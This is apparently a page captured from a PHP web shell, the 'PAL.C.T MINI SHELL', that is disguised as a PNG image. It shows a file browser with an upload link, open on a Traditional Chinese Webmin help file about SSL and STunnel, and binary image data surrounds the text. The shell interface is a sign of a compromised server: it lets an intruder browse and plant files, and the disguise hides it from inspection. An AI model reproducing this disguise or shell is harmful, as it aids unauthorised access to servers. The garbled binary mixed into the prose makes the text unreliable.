php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.zh_TW.auto.html

<header> SSL隧道簡介</header> SSL是一種用於在TCP連接通過網絡傳輸時對數據進行加密的協議。它最初是為了保護Web瀏覽器和服務器之間的流量而開發的,但可用於加密通常通過TCP協議發送的任何類型的數據流。 <p> SSL協議允許客戶端和服務器彼此進行身份驗證,以便客戶端可以確保它確實連接到它認為是的主機。這是通過使用證書來完成的,這些證書由客戶端認可的證書頒發機構頒發(以便可以對其進行驗證)並與特定的主機名關聯。沒有證書,攻擊者可以將SSL連接重定向到自己的服務器,並從認為與真實服務器通信的客戶端捕獲敏感信息。 <p>攻擊者可以通過訪問經過的網絡之一來捕獲和讀取未經加密的Internet上傳輸的任何數據。甚至可以輕鬆地在LAN上的客戶端和服務器系統之間傳輸數據。當您連接到telnet,FTP或POP3服務器時,您的密碼是通過網絡發送的,因此可以被攻擊者捕獲。 <p>只有在客戶端和服務器均支持SSL的情況下,SSL才能用於保護數據。大多數Web瀏覽器和郵件客戶端都可以建立SSL加密的HTTP,POP3和IMAP連接,但並非所有Web和POP3服務器都可以接受它們。特別是POP3很難保護,因為大多數Unix系統隨附的標準服務器根本不支持SSL。幸運的是,儘管有解決方案-STunnel。 <p> STunnel是一個簡單的程序,可以將未加密的連接轉換為SSL加密的連接。通常將其設置為從超級服務器(如inetd或xinetd)運行,然後運行某些其他程序(如不支持SSL的POP3服務器)。這種設計使其可以保護任何通常不受inetd運行的服務器,例如telnet,NNTP和IMAP服務器。 <p>但是,並非所有服務器都可以使用加密來有效地加以保護,因為沒有客戶端可以在SSL模式下使用它們。例如,我從未聽說過可以使用SSL的telnet或FTP客戶端,因為通用的SSH程序包已經允許加密的遠程登錄和文件傳輸。 <p>通過此Webmin模塊,可以輕鬆設置運行STunnel來啟動某些服務器程序的超級服務器服務。即使可以使用Internet服務模塊手動完成此操作,該程序也專門用於設置和配置STunnel。它會自動檢測您是否安裝了inetd和/或xinetd,讀取它們的配置以檢查現有的SSL隧道,並在創建新隧道時將其添加到其中。如果同時安裝了兩者,則新的SSL隧道將添加到xinetd配置中,因為我認為這是兩者中的佼佼者。 <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`